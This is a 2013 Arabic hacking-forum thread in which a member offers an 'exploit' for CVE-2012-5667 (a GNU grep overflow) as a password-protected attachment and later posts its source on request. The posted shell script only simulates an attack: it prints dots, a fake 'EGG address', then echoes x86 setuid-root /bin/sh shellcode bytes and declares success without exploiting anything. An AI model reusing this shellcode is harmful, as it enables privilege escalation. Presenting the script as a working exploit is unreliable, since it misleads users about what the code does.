TO DONATE : BTC => 1BU6R1C4AQ77LjLZswQNKFwAupw61i88Kn || PM => U4089661


اهم قوانين :1- منع الردود الباهتة مثل شكرااااا و أخواتها 2- لا يسمح بالمشاحنات الطائفية باآ شكل من الأشكال 3- عدم استعمال الألفاظ التافهة و الكلام البذىء 4- عدم وضع معرفات التواصل الأجتماعى بالردود 5- الأطلاع على كامل القوانين واجب 


العودة   الحماية للأبد -Security 4 Ever > قسم الحماية - Security section > قسم جديد الثغرات > قسم جديد ثغرات الأعضاء

قسم جديد ثغرات الأعضاء يختص بجديد ثغرات الأعضاء

 
أدوات الموضوع انواع عرض الموضوع
  #1  
قديم 12-07-2013, 08:53 PM
الصورة الرمزية chevr0sky
chevr0sky
| RCE St4r |
 
حـالة التــواجـد : chevr0sky غير متواجد حالياً
تاريخ التسجيل: Feb 2012
مكـان الإقامـة : الجزائر
الجــــنــــــس: ذكـر
الــهـــوايـــــة: التعلم
المشاركات: 626
شكراً:290
تم شكره 3,277 مرة في 527 مشاركة
معدل تقييم المستوى: 0
chevr0sky بدون تقييم
افتراضي Sploit for CVE-2012-5667

السلام عليكم و رحمة الله و بركاته.


هذا إستغلال للثغرة CVE-2012-5667


http://cve.mitre.org/cgi-bin/cvename...=CVE-2012-5667



ما هو suid ؟ : http://en.wikipedia.org/wiki/Setuid


POC :







الإستغلال في المرفقات.

باسوورد فك الضغط : chevr0sky  
الملفات المرفقة
نوع الملف: zip grep.zip‏ (517 بايت, المشاهدات 195)
رد مع اقتباس
  #2  
قديم 12-07-2013, 09:06 PM
الصورة الرمزية X01do3
X01do3
:: عضو خاص ::
 
حـالة التــواجـد : X01do3 غير متواجد حالياً
تاريخ التسجيل: Jul 2010
الجــــنــــــس: ذكـر
الــهـــوايـــــة: النجارة
المشاركات: 579
شكراً:1,399
تم شكره 1,624 مرة في 364 مشاركة
معدل تقييم المستوى: 10
X01do3 على طريق التميز
افتراضي رد: Sploit for CVE-2012-5667

كلما أدبني الدهــــر أراني نقص عقلي *** وإذا ما ازددت علما زادني علما بجهلي

Like :D

تم التجريب كالعادة كل شئ يجي من عندك يكون موزون

بارك الله فيك أخي العزيزي  

 

 

لا اله الا الله محمد رسول الله
رد مع اقتباس
2 أعضاء قالوا شكراً لـ X01do3 على المشاركة المفيدة:
  #3  
قديم 12-07-2013, 11:19 PM
الصورة الرمزية Mr.haili
Mr.haili
عضو مميز
 
حـالة التــواجـد : Mr.haili غير متواجد حالياً
تاريخ التسجيل: Jan 2011
الجــــنــــــس: ذكـر
المشاركات: 368
شكراً:680
تم شكره 258 مرة في 115 مشاركة
معدل تقييم المستوى: 10
Mr.haili على طريق التميز
افتراضي رد: Sploit for CVE-2012-5667

يعطيك العافيه

ولاكن ماهو الــcve ؟ هاي ثغره بالسيرفرات ولا كيف مافهمت ~!
 
رد مع اقتباس
الأعضاء الذين قالوا شكراً لـ Mr.haili على المشاركة المفيدة:
  #4  
قديم 12-07-2013, 11:30 PM
الصورة الرمزية b0y
b0y
مراقب
 
حـالة التــواجـد : b0y غير متواجد حالياً
تاريخ التسجيل: Jan 2013
الجــــنــــــس: ذكـر
المشاركات: 747
شكراً:3,113
تم شكره 2,558 مرة في 509 مشاركة
معدل تقييم المستوى: 8
b0y على طريق التميز
افتراضي رد: Sploit for CVE-2012-5667

اقتباس:
المشاركة الأصلية كتبت بواسطة Mr.haili مشاهدة المشاركة

يعطيك العافيه

ولاكن ماهو الــcve ؟ هاي ثغره بالسيرفرات ولا كيف مافهمت ~!
ال"CVE-2012-5667" عنوان الثغرة !!
اقتباس:
Deاستبدال scription
Multiple integer overflows in GNU Grep before 2.11 might allow context-dependent attackers to execute arbitrary code via vectors involving a long input line that triggers a heap-based buffer overflow.
 
يعني الأمر grep الإصدار ما قبل ال2.11 مصاب بهاي الثغرة !!
للتأكد من الإصدار نفذ الأمر : grep -V
بالتوفيق  

 

 



اقتباس:
المشاركة الأصلية كتبت بواسطة ApOcalYpse مشاهدة المشاركة

فقط توقف عن طلب النتيجة و تخيلها و السعي خلفها و قم بما عليك القيام به
...
الناس تحب النتيجة و لكنها تكره الطريق الصعب الذي يوصل اليها
اقتباس:
المشاركة الأصلية كتبت بواسطة Sec4ever مشاهدة المشاركة

فيه حكمة مهمة جدا ينقصنا نحن المسلمون العمل بها حتى تكون لنا مكانة بين الأخرين :

يجب العمل قدر المستطاع و ليس قدر الحاجة .
اقتباس:
المشاركة الأصلية كتبت بواسطة UzunDz مشاهدة المشاركة

ثانيا فيه ادمغة من العرب وموجودين معنا هنا بالمنتدى ويقدمو مواضيع ما تجدها عند الأجانب والتقليل من شان العرب امام الأجانب يسمى جهل و نقص في الشخصية ونوعية هذا الكلام لا تفيدنا الا في الرجوع الى الوراء,, وان كنت شايف نفسك متوقف في كيفية صنع ليتر فهذا لا يعني ان الجميع متوقف هناك بمعنى آخر لا تتكلم بصيغة الجمع عن العرب لأنك تمثل نفسك فقط
اقتباس:
المشاركة الأصلية كتبت بواسطة chevr0sky مشاهدة المشاركة

أنصحك بالتشمير عن سواعدك و الكد و التعب و كذلك سهر الليالي فلا توجد خلطة أو وصفة توصلك إلى مبتغاك.

رد مع اقتباس
4 أعضاء قالوا شكراً لـ b0y على المشاركة المفيدة:
  #5  
قديم 12-07-2013, 11:31 PM
الصورة الرمزية chevr0sky
chevr0sky
| RCE St4r |
 
حـالة التــواجـد : chevr0sky غير متواجد حالياً
تاريخ التسجيل: Feb 2012
مكـان الإقامـة : الجزائر
الجــــنــــــس: ذكـر
الــهـــوايـــــة: التعلم
المشاركات: 626
شكراً:290
تم شكره 3,277 مرة في 527 مشاركة
معدل تقييم المستوى: 0
chevr0sky بدون تقييم
افتراضي رد: Sploit for CVE-2012-5667

اقتباس:
المشاركة الأصلية كتبت بواسطة Mr.haili مشاهدة المشاركة

يعطيك العافيه

ولاكن ماهو الــcve ؟ هاي ثغره بالسيرفرات ولا كيف مافهمت ~!

معنى CVE

http://www.security-database.com/about.php?type=cve  
رد مع اقتباس
2 أعضاء قالوا شكراً لـ chevr0sky على المشاركة المفيدة:
  #6  
قديم 12-07-2013, 11:33 PM
الصورة الرمزية b0x
b0x
.:: Sec4ever The Great ::.
 
حـالة التــواجـد : b0x غير متواجد حالياً
تاريخ التسجيل: Jul 2010
الجــــنــــــس: ذكـر
المشاركات: 1,017
شكراً:1,414
تم شكره 3,791 مرة في 686 مشاركة
معدل تقييم المستوى: 11
b0x على طريق التميز
افتراضي رد: Sploit for CVE-2012-5667

يعطيك العافية شفروسكي من زمان عن مواضيعك الرائعة صديقي  
رد مع اقتباس
الأعضاء الذين قالوا شكراً لـ b0x على المشاركة المفيدة:
  #7  
قديم 12-07-2013, 11:36 PM
الصورة الرمزية chevr0sky
chevr0sky
| RCE St4r |
 
حـالة التــواجـد : chevr0sky غير متواجد حالياً
تاريخ التسجيل: Feb 2012
مكـان الإقامـة : الجزائر
الجــــنــــــس: ذكـر
الــهـــوايـــــة: التعلم
المشاركات: 626
شكراً:290
تم شكره 3,277 مرة في 527 مشاركة
معدل تقييم المستوى: 0
chevr0sky بدون تقييم
افتراضي رد: Sploit for CVE-2012-5667

اقتباس:
المشاركة الأصلية كتبت بواسطة zaidoohxhacker مشاهدة المشاركة

يعطيك العافية شفروسكي من زمان عن مواضيعك الرائعة صديقي
مشكور أخي زيد على ردك, بارك الله فيك.  
رد مع اقتباس
الأعضاء الذين قالوا شكراً لـ chevr0sky على المشاركة المفيدة:
  #8  
قديم 13-07-2013, 03:03 AM
الصورة الرمزية zrxrz
zrxrz
عضو نشيط
 
حـالة التــواجـد : zrxrz غير متواجد حالياً
تاريخ التسجيل: Dec 2010
الجــــنــــــس: ذكـر
المشاركات: 64
شكراً:86
تم شكره 34 مرة في 23 مشاركة
معدل تقييم المستوى: 10
zrxrz على طريق التميز
افتراضي رد: Sploit for CVE-2012-5667

src please ?  
رد مع اقتباس
  #9  
قديم 13-07-2013, 03:14 AM
الصورة الرمزية chevr0sky
chevr0sky
| RCE St4r |
 
حـالة التــواجـد : chevr0sky غير متواجد حالياً
تاريخ التسجيل: Feb 2012
مكـان الإقامـة : الجزائر
الجــــنــــــس: ذكـر
الــهـــوايـــــة: التعلم
المشاركات: 626
شكراً:290
تم شكره 3,277 مرة في 527 مشاركة
معدل تقييم المستوى: 0
chevr0sky بدون تقييم
افتراضي رد: Sploit for CVE-2012-5667

اقتباس:
المشاركة الأصلية كتبت بواسطة zrxrz مشاهدة المشاركة

src please ?

كود PHP:
#!/bin/sh
sleep 1
echo "CVE-2012-5667: vulnerable."
sys="123"

        
for i in `seq 1 $sys`
        do
                
ind=$RANDOM
                
if [ "$ind-le "16380" ]
                
then
                        
echo -"."
                                                
sleep 0.5
                
else
                        echo -
"."
                
fi
        done
                sleep 1
                
echo " "
                
echo "EGG address: 0xbffff573"
                
sleep 1
                
echo "\x31\xc0\x31\xdb\x31\xd2\x53\x68\x55\x6e\x69\x0a\x68\x64\x55"
                
echo "\x55\x4d\x68\x41\x68\x6d\x61\x89\xe1\xb2\x0f\xb0\x04\xcd\x80"
                
echo "\x31\xc0\x31\xdb\x31\xc9\xb0\x17\xcd\x80\x31\xc0\x50\x68\x6e"
                
echo "\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x8d\x54\x24\x08\x50"
                
echo "\x53\x8d\x0c\x24\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80"

sleep 2

echo "you got!"
echo " " 
 
رد مع اقتباس
2 أعضاء قالوا شكراً لـ chevr0sky على المشاركة المفيدة:
  #10  
قديم 13-07-2013, 10:53 AM
الصورة الرمزية Processeur-Dz
Processeur-Dz
عضو مميز
 
حـالة التــواجـد : Processeur-Dz غير متواجد حالياً
تاريخ التسجيل: Mar 2012
الجــــنــــــس: ذكـر
المشاركات: 291
شكراً:945
تم شكره 391 مرة في 123 مشاركة
معدل تقييم المستوى: 0
Processeur-Dz بدون تقييم
افتراضي رد: Sploit for CVE-2012-5667

برك لله فيم خونا جميل :__)  

 

 


رد مع اقتباس
الأعضاء الذين قالوا شكراً لـ Processeur-Dz على المشاركة المفيدة:

الكلمات الدلالية (Tags)
cve, cve-2012-5667, for, sploit


الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1)
 
أدوات الموضوع
انواع عرض الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع


الساعة الآن 02:03 AM